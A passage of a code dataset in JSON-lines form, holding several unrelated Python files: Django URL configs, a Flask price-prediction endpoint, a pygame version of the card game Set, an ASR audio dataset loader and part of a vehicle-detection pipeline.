folder\")\n print(\" 1: upload file\")\n try:\n c = int(input(\">>>\"))\n except:\n print(\"bye!\")\n sys.exit(1)\n options = [parsed.folder, parsed.fileUpload]\n if (c > 1 or c < 0):\n print(\"wrong format\")\n return uploadParsed(handler, projectId, scriptId)\n return options[c](handler, projectId, scriptId)\n\ndef main():\n print(\"Welcome to set traces data sync\")\n\n args = sys.argv\n if len(args) < 2:\n print(\"not enough arguments\")\n getHelp()\n sys.exit(1)\n \n protocol = \"https://\"\n\n if (\"--use-http\" in args or args[1] == \"local\"):\n protocol = \"http://\"\n\n localUrl = protocol+\"localhost:8080\"\n centralizedUrl = protocol+\"backend.settraces.com\"\n\n if args[1] == \"help\":\n getHelp()\n sys.exit(1)\n\n if args[1] == \"local\":\n url = localUrl\n elif args[1] == \"centralized\":\n url = centralizedUrl\n else:\n print(\"Missing argument: Server. Use sync like this: python3 sync.py [server (local or centralized)] [flags]\")\n print(\"Use python3 sync.py help - to get more help\")\n \n print(\"\\n\")\n print(\"Using backend located at: %s\" % url)\n print(\"\\n\")\n\n handler = RESTHandler(url)\n\n id = getProjectId(handler)\n print(\"Using projectId: %s\" % id)\n typeId = getTypes(handler, id)\n print(\"\\n\")\n print(\"Using script type id: %s\" % typeId)\n print(\"\\n\")\n print(\"\\n\")\n print(\"Choose mode:\")\n print(\"0. Upload parsed data\")\n sleep(.5)\n print(\"... Choosing Upload due to lack of other choices\")\n\n options = [uploadParsed]\n\n options[0](handler, id, typeId)\n\nif __name__ == '__main__':\n main()\n #handler = RESTHandler(\"http://localhost:8080\")\n #uploadParsed(handler, 'eaf8bbc4-ba82-45bc-bbaa-8eb88c0d2f27', '00a27082-f7ea-4e15-9f6d-1ee373543f3a')","sub_path":"sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"165020945","text":"from django.conf.urls import url\n\nfrom . import views\napp_name='stock'\nurlpatterns=[\n\turl(r'^login/$', views.login,name='login'),\n\turl(r'^auth/$',views.auth_view, name='auth_view'),\n\turl(r'^logout/$',views.logout, name='logout'),\n\turl(r'^auth/$',views.auth_view, name='auth_view'),\n\turl(r'^loggedin/$',views.loggedin, name='loggedin'),\n\turl(r'^invalid/$',views.invalid_login, name='invalid_login'),\n\turl(r'^register/$',views.register, name='register'),\n\turl(r'^register_success/$',views.register_success, name='register_success'),\n\turl(r'^menu/$',views.menu, name='menu'),\n\turl(r'^location/$',views.location, name='location'),\n\turl(r'^location_success/$',views.location_success, name='location_success'),\n\turl(r'^update/$',views.update, name='update'),\n\turl(r'^list/$',views.list, name='list'),\n\turl(r'^stock_success/$',views.stock_success, name='stock_success'),\n\t#url(r'^(?P[a-z]+)/stock_not_exist/$',views.stock_not_exist, name='stock_not_exist'),\n\turl(r'^list/$',views.list, name='list'),\n\turl(r'^delete/$',views.delete, name='delete'),\n\t\t\n]","sub_path":"stock/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"143965656","text":"from flask import Flask\nfrom flask import request\nimport pandas as pd\nimport numpy as np\nimport pickle\napp = Flask(__name__)\ndef enter_here(mileage, year, make_model, years, original_price, Type):\n\tpl = pickle.load(open( \"pl\", \"rb\" ))\n\tdf_ex = pd.DataFrame({'Mileage':float(mileage), 'Year':float(year),'Make_Model':make_model, 'Years': float(years),'Original Price':float(original_price), 'Type':Type},index=[0])\n\treturn 'After %d years and %d mileage, your %s will be worth $%d' % (years, mileage, make_model, pl.predict(df_ex).tolist()[0])\n \n@app.route(\"/predict\")\ndef hello():\n\tmileage = request.args.get('mileage')\n\tyear = request.args.get('year')\n\tmake_model = request.args.get('make_model').replace('%20', ' ')\n\tyears = request.args.get('years')\n\toriginal_price = request.args.get('original_price')\n\tType = request.args.get('Type').replace('%20', ' ')\n\t# print(mileage, year, make_model, years, original_price, Type)\n\tresult = enter_here(int(mileage), int(year), make_model, int(years), int(original_price), Type)\n\treturn result","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"142155299","text":"'''\nset.py\nAdi Faintuch\n7/15/19\n'''\n'''\nSome thing that I need to do:\n\n-fill in the README\n -good link: https://thehftguy.com/2016/10/24/heres-how-to-make-a-good-github-project-for-your-resume/\n'''\n\nimport pygame\nfrom random import shuffle\nimport model\nfrom collections import defaultdict\n\nclicked_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/clicked.png')\n\ndef make_image_clicked(image_key, image_value, surface, image_list, displayed_cards):\n '''makes the image clicked'''\n new_x = image_value.x - 5\n new_y = image_value.y - 5\n new_width = image_value.width + 10\n new_height = image_value.height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (255, 242, 56), new_rect)\n surface.blit(image_key.image, image_value)\n\ndef make_image_unclicked(image_key, image_value, surface, image_list, displayed_cards):\n '''makes the image unclicked'''\n new_x = image_value.x - 5\n new_y = image_value.y - 5\n new_width = image_value.width + 10\n new_height = image_value.height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (0, 0, 0), new_rect)\n surface.blit(image_key.image, image_value)\n\ndef make_player_clicked(x, y, width, height, surface, player1_clicked, player2_clicked):\n '''makes the player1 or player2 card clicked'''\n new_x = x - 5\n new_y = y - 5\n new_width = width + 10\n new_height = height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (255, 242, 56), new_rect)\n\n if(player1_clicked):\n display_player1(surface)\n else:\n display_player2(surface)\n\ndef make_player_unclicked(x, y, width, height, surface, player1_clicked, player2_clicked):\n '''makes the player1 or player2 card unclicked'''\n new_x = x - 5\n new_y = y - 5\n new_width = width + 10\n new_height = height + 10\n new_rect = pygame.Rect(new_x, new_y, new_width, new_height)\n\n pygame.draw.rect(surface, (0, 0, 0), new_rect)\n\n if(player1_clicked):\n display_player1(surface)\n else:\n display_player2(surface)\n\ndef create_initial_display_card_positions(displayed_cards):\n '''created the initial displayed_cards positions'''\n upper_left_x = 40 #plus 230 each time\n upper_left_y = 30 #plus 149 every 3 cards\n\ndef display_cards_initial(displayed_cards, image_list, surface, total_score, deck_size, single_player, player1_score, player2_score):\n '''displays the cards for the first time'''\n if(single_player):\n pygame.display.set_mode((700, 750))\n display_score_single(surface, total_score)\n else:\n pygame.display.set_mode((1000, 750))\n display_players(surface)\n display_score_multi(surface, player1_score, player2_score)\n\n upper_left_x = 40 #plus 230 each time\n upper_left_y = 30 #plus 149 every 3 cards\n\n current_card = 0\n\n cards_to_display_list = list(displayed_cards.keys())\n for i in range(4):\n upper_left_x = 40\n for j in range(3):\n current_rect = surface.blit(cards_to_display_list[current_card].image, (upper_left_x, upper_left_y))\n displayed_cards[cards_to_display_list[current_card]] = current_rect\n\n upper_left_x += 230\n current_card += 1\n upper_left_y += 149\n\n display_deck_size(surface, deck_size)\n display_no_set_button(surface)\n display_get_hint_button(surface)\n return displayed_cards\n\ndef display_cards_later(displayed_cards, image_list, surface, total_score, deck_size, single_player, player1_score, player2_score):\n '''displays the cards after the initial time'''\n if(single_player):\n pygame.display.set_mode((700, 750))\n display_score_single(surface, total_score)\n else:\n pygame.display.set_mode((1000, 750))\n display_players(surface)\n display_score_multi(surface, player1_score, player2_score)\n\n for k,v in displayed_cards.items():\n current_rect = surface.blit(k.image, v)\n\n display_deck_size(surface, deck_size)\n display_no_set_button(surface)\n display_get_hint_button(surface)\n return displayed_cards\n\ndef get_rect_of_card(card, displayed_cards):\n '''returns the rect of the clicked card in the displayed_cards list'''\n rect = displayed_cards[card]\n return rect\n\ndef print_set(displayed_cards):\n '''prints a set solution'''\n set = model.find_a_set(displayed_cards)\n if(set == []):\n print(\"set is empty\")\n else:\n for card in set:\n print(\"card in set: \", card, \"\\n\")\n\ndef display_score_single(surface, total_score):\n '''displays the score for singleplayer'''\n font = pygame.font.Font(None, 50)\n #print(\"FONTS ARE: \", pygame.font.get_fonts())\n\n to_print = \"score: \" + str(total_score)\n text = font.render(to_print, True, [255, 255, 255])\n text_rect = text.get_rect(center =(350, 650))\n surface.blit(text, text_rect)\n\ndef display_score_multi(surface, player1_score, player2_score):\n '''displays the score for multiplayer'''\n font = pygame.font.Font(None, 50)\n\n to_print1 = \"player 1 score: \" + str(player1_score)\n text = font.render(to_print1, True, [255, 255, 255])\n text_rect = text.get_rect(center =(840, 345))\n surface.blit(text, text_rect)\n\n to_print2 = \"player 2 score: \" + str(player2_score)\n text = font.render(to_print2, True, [255, 255, 255])\n text_rect = text.get_rect(center =(840, 545))\n surface.blit(text, text_rect)\n\ndef display_deck_size(surface, deck_size):\n '''displays the size of the deck'''\n font = pygame.font.Font(None, 50)\n to_print = \"cards left in deck: \" + str(deck_size)\n text = font.render(to_print, True, [255, 255, 255])\n text_rect = text.get_rect(center = (350, 723))\n surface.blit(text, text_rect)\n\ndef display_end_score_single(surface, total_score):\n '''displays the score at the end of the game for singleplayer'''\n font = pygame.font.Font(None, 100)\n to_print = \"score: \" + str(total_score)\n text = font.render(to_print, True, [0, 0, 250])\n text_rect = text.get_rect(center =(350, 500))\n surface.blit(text, text_rect)\n\ndef display_end_score_multi(surface, player1_score, player2_score):\n '''displays the score at the end of the game for multiplayer'''\n font = pygame.font.Font(None, 80)\n to_print = \"P1 score: \" + str(player1_score)\n to_print += \" P2 score: \" + str(player2_score)\n text = font.render(to_print, True, [0, 0, 250])\n text_rect = text.get_rect(center =(500, 600))\n surface.blit(text, text_rect)\n\ndef display_end_game_single(surface, total_score):\n '''handles the end of the game display for singleplayer'''\n pygame.display.set_mode((700, 750))\n game_over_rect = pygame.Rect(150,150,350,350)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/gameover_single.png'), game_over_rect)\n display_end_score_single(surface,total_score)\n\ndef display_end_game_multi(surface, player1_score, player2_score, winner):\n '''handles the end of the game display for multiplayer'''\n pygame.display.set_mode((1000, 750))\n game_over_rect = pygame.Rect(240,35,350,350)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/gameover_multi.png'), game_over_rect)\n if(winner == 'player1'):\n player1win_rect = pygame.Rect(120,400,1310,152)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/player1win.png'), player1win_rect)\n elif(winner == 'player2'):\n player2win_rect = pygame.Rect(120,400,1310,152)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/player2win.png'), player2win_rect)\n else:\n tie_rect = pygame.Rect(120,400,1310,152)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/tie.png'), tie_rect)\n display_end_score_multi(surface, player1_score, player2_score)\n\ndef display_no_set_button(surface):\n no_set_rect = pygame.Rect(30,600,5,5)\n no_set_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/noset.png')\n surface.blit(no_set_image, no_set_rect)\n\ndef display_get_hint_button(surface):\n get_hint_rect = pygame.Rect(430,600,5,5)\n get_hint_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/gethint.png')\n surface.blit(get_hint_image, get_hint_rect)\n\ndef create_displayed_cards(initial_cards):\n '''creates the initial 12 cards for display_cards'''\n displayed_cards_return = defaultdict()\n for card in initial_cards:\n displayed_cards_return[card] = pygame.Rect(0,0,0,0)\n return displayed_cards_return\n\ndef reset_board(surface, deck, displayed_cards, image_list, total_score, player1_score, player2_score, single_player):\n '''resets the board when there is no set and player clicks 'no set' '''\n model.add_cards_back_to_deck(deck, displayed_cards)\n shuffle(deck)\n initial_cards = model.create_initial_twelve_cards(deck)\n displayed_cards = create_displayed_cards(initial_cards)\n model.remove_used_cards_from_deck(deck, displayed_cards.keys())\n clicked_images = defaultdict()\n displayed_cards_return = display_cards_initial(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n return displayed_cards_return\n\ndef click_card_in_set(surface, image_list, displayed_cards, solution_set, clicked_images):\n '''clicks on a card in the solution set when user clicks on 'get hint' button'''\n for k,v in displayed_cards.items():\n if (k in solution_set and k not in clicked_images):\n clicked_images[k] = v\n make_image_clicked(k, v, surface, image_list, displayed_cards)\n break\n\ndef make_player_selection_screen(surface):\n '''makes the initial screen where the user can select single or multi player'''\n pygame.display.set_mode((700, 750))\n single_player_rect = pygame.Rect(150,200,5,5)\n single_player_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/singleplayer.png')\n #no_set_image = pygame.transform.scale(no_set_image, (240, 58))\n surface.blit(single_player_image, single_player_rect)\n\n multi_player_rect = pygame.Rect(150,400,5,5)\n multi_player_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/multiplayer.png')\n #get_hint_image = pygame.transform.scale(get_hint_image, (240, 50))\n surface.blit(multi_player_image, multi_player_rect)\n\ndef display_player1(surface):\n '''displays player 1'''\n player1_rect = pygame.Rect(675,200,316,98)\n player1_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/player1.png')\n surface.blit(player1_image, player1_rect)\n\ndef display_player2(surface):\n '''displays player 2'''\n player2_rect = pygame.Rect(675,400,316,98)\n player2_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/player2.png')\n surface.blit(player2_image, player2_rect)\n\ndef display_players(surface):\n '''displays players 1 and 2 and their scores'''\n display_player1(surface)\n display_player2(surface)\n\n\ndef run():\n total_score = 0\n player1_score = 0\n player2_score = 0\n\n winner = 'None'\n\n pygame.init()\n\n list_of_rect = []\n\n for i in range(11):\n rect_to_add = 'rect' + str(i + 1)\n list_of_rect.append(rect_to_add)\n\n initial_surface = pygame.display.set_mode((700, 750))\n\n make_player_selection_screen(initial_surface)\n\n single_player = False\n\n _waiting = True\n while(_waiting):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n _waiting = False\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n single_player_rect = pygame.Rect(150,200,402,98)\n multi_player_rect = pygame.Rect(150,400,402,98)\n if(single_player_rect.collidepoint(pos)):\n single_player = True\n _waiting = False\n elif(multi_player_rect.collidepoint(pos)):\n _waiting = False\n pygame.display.flip()\n\n\n surface = pygame.display.set_mode((700, 750))\n\n if(single_player == False):\n surface = pygame.display.set_mode((1000, 750))\n\n\n running = True\n find_solution_set = True\n\n deck = model.create_deck()\n shuffle(deck)\n\n initial_cards = model.create_initial_twelve_cards(deck)\n displayed_cards = create_displayed_cards(initial_cards)\n model.remove_used_cards_from_deck(deck, displayed_cards.keys())\n\n image_list = []\n\n for i in range(81):\n new_pathname = '/Users/adifaintuch/Desktop/set/src/card' + str(i + 1) + '.png'\n image_list.append(pygame.image.load(new_pathname))\n\n #a defaultdict of key = card and value = rect\n clicked_images = defaultdict()\n\n display_cards_initial(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n\n clicks = 0\n set_of_removed_cards = set()\n\n solution_set = []\n\n print_solution_set_once = False\n\n player1_clicked = False\n player2_clicked = False\n\n while running:\n for event in pygame.event.get():\n if(find_solution_set):\n solution_set = model.find_a_set(displayed_cards)\n find_solution_set == False\n if(len(deck) == 0 and len(solution_set) == 0):\n if(single_player):\n display_end_game_single(surface, total_score)\n else:\n if(player1_score > player2_score):\n display_end_game_multi(surface, player1_score, player2_score, 'player1')\n elif(player1_score < player2_score):\n display_end_game_multi(surface, player1_score, player2_score, 'player2')\n else:\n display_end_game_multi(surface, player1_score, player2_score, 'tie')\n\n if((not single_player and (player1_clicked == False and player2_clicked == False) or clicks < 3) or (single_player and clicks < 3)):\n if(print_solution_set_once == False):\n print_solution_set_once = True\n print()\n print(\"solution set\")\n print(solution_set)\n print()\n print(\"size of deck\", len(deck))\n if event.type == pygame.QUIT:\n running = False\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n no_set_rect = pygame.Rect(30,605,240,100)\n get_hint_rect = pygame.Rect(430,605,240,100)\n player1_rect = pygame.Rect(675,200,316,98)\n player2_rect = pygame.Rect(675,400,316,98)\n\n if(no_set_rect.collidepoint(pos) and solution_set == [] and len(deck) > 0):\n displayed_cards = reset_board(surface, deck, displayed_cards, image_list, total_score, player1_score, player2_score, single_player)\n find_solution_set = True\n player1_clicked = False\n player2_clicked = False\n elif(no_set_rect.collidepoint(pos)):\n print(\"====CLICKED NO SET RECT AND THERE IS A SET====\")\n elif(get_hint_rect.collidepoint(pos)):\n if(solution_set != []):\n clicks += 1\n click_card_in_set(surface, image_list, displayed_cards, solution_set, clicked_images)\n\n else:\n clicked_player = False\n if(not single_player):\n if(player1_rect.collidepoint(pos) and not player1_clicked and not player2_clicked):\n player1_clicked = True\n make_player_clicked(675,200,316,98,surface, player1_clicked, player2_clicked)\n clicked_player = True\n elif(player2_rect.collidepoint(pos) and not player2_clicked and not player1_clicked):\n player2_clicked = True\n make_player_clicked(675,400,316,98,surface, player1_clicked, player2_clicked)\n clicked_player = True\n elif(player1_rect.collidepoint(pos) and player1_clicked):\n make_player_unclicked(675,200,316,98,surface, player1_clicked, player2_clicked)\n player1_clicked = False\n clicked_player = True\n elif(player2_rect.collidepoint(pos) and player2_clicked):\n make_player_unclicked(675,400,316,98,surface, player1_clicked, player2_clicked)\n player2_clicked = False\n clicked_player = True\n if(clicked_player == False and clicks < 3):\n for key, value in displayed_cards.items():\n if value.collidepoint(pos):\n if(key not in set_of_removed_cards):\n if(key not in clicked_images):\n clicks += 1\n clicked_images[key] = value\n make_image_clicked(key, value, surface, image_list, displayed_cards)\n else:\n clicks -= 1\n make_image_unclicked(key, value, surface, image_list, displayed_cards)\n del clicked_images[key]\n else:\n clicks = 0\n is_a_set = model.check_for_set(clicked_images)\n if(is_a_set):\n print_solution_set_once = False\n print()\n print(\"is a set\")\n print()\n if(single_player):\n total_score += 1\n else:\n if(player1_clicked):\n player1_score += 1\n else:\n player2_score += 1\n list_of_rect = []\n for card in clicked_images:\n list_of_rect.append(get_rect_of_card(card, displayed_cards))\n set_of_removed_cards.add(card)\n displayed_cards.pop(card)\n clicked_images = defaultdict()\n if(len(deck) != 0):\n model.add_three_new_cards(deck, displayed_cards, list_of_rect)\n if(single_player):\n display_cards_later(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n elif(player1_clicked):\n display_cards_later(displayed_cards, image_list, surface, player1_score, len(deck), single_player, player1_score, player2_score)\n player1_clicked = False\n else:\n display_cards_later(displayed_cards, image_list, surface, player2_score, len(deck), single_player, player1_score, player2_score)\n player2_clicked = False\n find_solution_set = True\n\n else:\n print(\"is not a set\")\n clicked_images = defaultdict()\n display_cards_later(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n player1_clicked = False\n player2_clicked = False\n\n\n pygame.display.flip()\n\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n\trun()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"479590115","text":"from django.conf.urls import patterns, url, include\nfrom reviews import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^publications/$', views.index, {'show' : ['publications']}, name='index_publications'),\n url(r'^presentations/$', views.index, {'show' : ['presentations']}, name='index_presentations'),\n\n url(r'^my/$', views.index_authored, name='index_my'),\n url(r'^my/publications/$', views.index_authored, {'show' : ['publications']}, name='index_my_publications'),\n url(r'^my/presentations/$', views.index_authored, {'show' : ['presentations']}, name='index_my_presentations'),\n\n url(r'^myreviews/$', views.index_reviewer, name='index_review'),\n url(r'^myreviews/publications/$', views.index_reviewer, {'show' : ['publications']}, name='index_review_publications'),\n url(r'^myreviews/presentations/$', views.index_reviewer, {'show' : ['presentations']}, name='index_review_presentations'),\n\n url(r'^committee/$', views.index_admin, name='index_admin'),\n url(r'^committee/publications/$', views.index_admin, {'show' : ['publications']}, name='index_admin_publications'),\n url(r'^committee/presentations/$', views.index_admin, {'show' : ['presentations']}, name='index_admin_presentations'),\n\n url(r'^(?PP\\d+(-v\\d)?)/import/$', views.import_publication, name='import'),\n url(r'^(?PG\\d+(-[v|x]\\d)?)/import/$', views.import_presentation, name='import_presentation'),\n\n url(r'^(?P[P|G]\\d+)/', include(patterns('',\n url(r'^$', views.detail, name='detail'),\n url(r'^edit/$', views.edit, name='edit'),\n url(r'^withdraw/$', views.withdraw, name='withdraw'),\n url(r'^accept/$', views.accept, name='accept'),\n url(r'^approve_abstract/$', views.approve_abstract, name='approve_abstract'),\n url(r'^comment/$', views.comment, name='comment'),\n\n url(r'^draft/(?P\\d+)/', include(patterns('',\n url(r'^$', views.draft, name='draft'),\n url(r'^review/$', views.review, name='review'),\n url(r'^review/(?P\\d+)$', views.review, name='review'),\n url(r'^approve/$', views.approve, name='approve'),\n ))),\n\n ))),\n\n url(r'^journals/add/$', views.add_journal, name='add_journal'),\n )\n","sub_path":"reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286489783","text":"#!/usr/bin/env python3\n\nimport sys, os, re, datetime, argparse, shutil, yaml, fnmatch, colorama\nfrom colorama import Fore as cf\n\ncolorama.init()\n\nVERSION = \"2.00\"\nDATE = \"2017-02-26\"\n\ndef init():\n print(cf.BLUE + \"This is DeGeŠ-prepare, version \" + cf.MAGENTA + VERSION + cf.BLUE + \" [\" + cf.MAGENTA + DATE + cf.BLUE + \"]\")\n print(cf.BLUE + \"Invoked on file \" + cf.MAGENTA + args.file.name + cf.RESET)\n\ndef abortError(e):\n print(cf.RED + e.strerror + cf.WHITE)\n sys.exit(3)\n\ndef climbUp(level):\n return os.path.abspath(os.path.join(os.path.dirname(rootFile), *(['..'] * level)))\n\ndef metadataFile(level):\n return os.path.abspath(os.path.join(os.path.join(climbUp(level)), 'meta.yaml'))\n\ndef protectedLoad(fileName):\n try:\n return yaml.load(open(fileName, 'r+'))\n except FileNotFoundError as e:\n print(cf.RED + \"File not found: {}\".format(fileName) + cf.WHITE)\n sys.exit(2)\n except yaml.YAMLError as e:\n print(cf.RED + \"Could not parse YAML file {}\".format(fileName) + cf.WHITE)\n sys.exit(3)\n\ndef superstructure(level):\n name = os.path.basename(os.path.normpath(climbUp(level)))\n content = protectedLoad(metadataFile(level))\n return (name, content) \n\ndef processMetadata():\n moduleName, moduleConf = superstructure(3)\n volumeName, volumeConf = superstructure(2)\n semesterName, semesterConf = superstructure(1)\n roundName, roundConf = superstructure(0)\n problems = []\n\n\n for directory in sorted(os.listdir(rootDir)):\n fullName = os.path.join(rootDir, directory)\n if os.path.isdir(fullName):\n problems.append(protectedLoad(os.path.join(fullName, 'meta.yaml')))\n\n print(rootFile)\n print(rootDir)\n print(inputRootDir)\n\ndef bye():\n print(cf.GREEN + \"Everything finished successfully, bye\")\n\n\n\nparser = argparse.ArgumentParser(\n description = \"Prepare and compile a DeGeŠ XeLaTeX template for a single round from repository\",\n)\nparser.add_argument('file', type = argparse.FileType('r'), help = 'round\\'s YAML metadata file')\nargs = parser.parse_args()\n\nrootFile = args.file.name\nrootDir = os.path.dirname(rootFile)\ninputRootDir = re.sub('source/', 'input/', os.path.dirname(rootFile))\n\ninit()\nprocessMetadata()\nbye()\n","sub_path":"core/dgs-prepare.py","file_name":"dgs-prepare.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"359129043","text":"# Taken straight from Patter https://github.com/ryanleary/patter\n# TODO: review, and copyright and fix/add comments\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom .manifest import Manifest\n\n\ndef seq_collate_fn(batch):\n def find_max_len(seq, index):\n max_len = -1\n for item in seq:\n if item[index].size(0) > max_len:\n max_len = item[index].size(0)\n return max_len\n\n batch_size = len(batch)\n\n audio_signal, audio_lengths = None, None\n if batch[0][0] is not None:\n max_audio_len = find_max_len(batch, 0)\n\n audio_signal = torch.zeros(batch_size, max_audio_len,\n dtype=torch.float)\n audio_lengths = []\n for i, s in enumerate(batch):\n audio_signal[i].narrow(0, 0, s[0].size(0)).copy_(s[0])\n audio_lengths.append(s[1])\n audio_lengths = torch.tensor(audio_lengths, dtype=torch.long)\n\n max_transcript_len = find_max_len(batch, 2)\n\n transcript = torch.zeros(batch_size, max_transcript_len, dtype=torch.long)\n transcript_lengths = []\n for i, s in enumerate(batch):\n transcript[i].narrow(0, 0, s[2].size(0)).copy_(s[2])\n transcript_lengths.append(s[3])\n transcript_lengths = torch.tensor(transcript_lengths, dtype=torch.long)\n\n return audio_signal, audio_lengths, transcript, transcript_lengths\n\n\ndef audio_seq_collate_fn(batch):\n \"\"\"\n collate a batch (iterable of (sample tensor, label tensor) tuples) into\n properly shaped data tensors\n :param batch:\n :return: inputs (batch_size, num_features, seq_length), targets,\n input_lengths, target_sizes\n \"\"\"\n # sort batch by descending sequence length (for packed sequences later)\n batch.sort(key=lambda x: -x[0].size(0))\n minibatch_size = len(batch)\n\n # init tensors we need to return\n inputs = torch.zeros(minibatch_size, batch[0][0].size(0))\n input_lengths = torch.zeros(minibatch_size, dtype=torch.long)\n target_sizes = torch.zeros(minibatch_size, dtype=torch.long)\n targets = []\n metadata = []\n\n # iterate over minibatch to fill in tensors appropriately\n for i, sample in enumerate(batch):\n input_lengths[i] = sample[0].size(0)\n inputs[i].narrow(0, 0, sample[0].size(0)).copy_(sample[0])\n target_sizes[i] = len(sample[1])\n targets.extend(sample[1])\n metadata.append(sample[2])\n targets = torch.tensor(targets, dtype=torch.long)\n return inputs, targets, input_lengths, target_sizes, metadata\n\n\nclass AudioDataset(Dataset):\n def __init__(self, manifest_filepath, labels, featurizer,\n max_duration=None,\n min_duration=None, max_utts=0, normalize=True,\n trim=False, eos_id=None, logger=False, load_audio=True):\n \"\"\"\n Dataset that loads tensors via a json file containing paths to audio\n files, transcripts, and durations\n (in seconds). Each new line is a different sample. Example below:\n\n {\"audio_filepath\": \"/path/to/audio.wav\", \"text_filepath\":\n \"/path/to/audio.txt\", \"duration\": 23.147}\n ...\n {\"audio_filepath\": \"/path/to/audio.wav\", \"text\": \"the\n transcription\", offset\": 301.75, \"duration\": 0.82, \"utt\":\n \"utterance_id\",\n \"ctm_utt\": \"en_4156\", \"side\": \"A\"}\n\n Args:\n manifest_filepath: Path to manifest json as described above. Can\n be coma-separated paths.\n labels: String containing all the possible characters to map to\n featurizer: Initialized featurizer class that converts paths of\n audio to feature tensors\n max_duration: If audio exceeds this length, do not include in\n dataset\n min_duration: If audio is less than this length, do not include\n in dataset\n max_utts: Limit number of utterances\n normalize: whether to normalize transcript text (default): True\n eos_id: Id of end of sequence symbol to append if not None\n load_audio: Boolean flag indicate whether do or not load audio\n \"\"\"\n m_paths = manifest_filepath.split(',')\n self.manifest = Manifest(m_paths, labels,\n max_duration=max_duration,\n min_duration=min_duration, max_utts=max_utts,\n normalize=normalize)\n self.featurizer = featurizer\n self.trim = trim\n self.eos_id = eos_id\n self.load_audio = load_audio\n if logger:\n logger.info(\n \"Dataset loaded with {0:.2f} hours. Filtered {1:.2f} \"\n \"hours.\".format(\n self.manifest.duration / 3600,\n self.manifest.filtered_duration / 3600))\n\n def __getitem__(self, index):\n sample = self.manifest[index]\n if self.load_audio:\n duration = sample['duration'] if 'duration' in sample else 0\n offset = sample['offset'] if 'offset' in sample else 0\n features = self.featurizer.process(sample['audio_filepath'],\n offset=offset,\n duration=duration,\n trim=self.trim)\n f, fl = features, torch.tensor(features.shape[0]).long()\n # f = f / (torch.max(torch.abs(f)) + 1e-5)\n else:\n f, fl = None, None\n\n t, tl = sample[\"transcript\"], len(sample[\"transcript\"])\n if self.eos_id is not None:\n t = t + [self.eos_id]\n tl += 1\n\n return \\\n f, fl, \\\n torch.tensor(t).long(), torch.tensor(tl).long()\n\n def __len__(self):\n return len(self.manifest)\n","sub_path":"collections/nemo_asr/nemo_asr/parts/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595222458","text":"import cv2\nimport numpy as np\nimport classification\nfrom classification import Classifier\nfrom scipy.ndimage.measurements import label, find_objects\nfrom tqdm import tqdm\nimport utils\n\nWINDOW_SIZES = [ 30, 40, 60, 90, 120, 180 ]\nHORIZON_LINE = 440\n\nclass Pipeline:\n\n def __init__(self):\n self.classifier = classification.load()\n self.heatMap = np.zeros((720, 1280), dtype=np.float32)\n\n def sliding_windows():\n for windowSize in WINDOW_SIZES:\n columnShift = windowSize // 4\n columnNum = (1280 - windowSize) // columnShift + 1\n rowShift = windowSize // 4\n for column in range(columnNum):\n for row in range(-1, 2):\n top = HORIZON_LINE - windowSize // 3 - row * rowShift\n bottom = top + windowSize\n left = column * columnShift\n right = left + windowSize\n windowMask = np.ix_(\n range(top, bottom),\n range(left, right))\n yield windowMask\n\n def update_heat_map(self, image):\n self.heatMap *= 0.9\n for windowMask in Pipeline.sliding_windows():\n windowImage = image[windowMask]\n windowImage = cv2.resize(windowImage, (64, 64))\n prediction = self.classifier.predict(windowImage)\n if prediction > 0.1:\n self.heatMap[windowMask] += (0.01 * prediction)\n self.heatMap = np.clip(self.heatMap, 0.0, 1.0)\n\n def process(self, image):\n self.update_heat_map(image)\n\n heatMap = np.uint8(self.heatMap * 255.0)\n heatMap[heatMap < 25] = 0\n labelMap, labels = label(heatMap)\n\n for labeledArea in 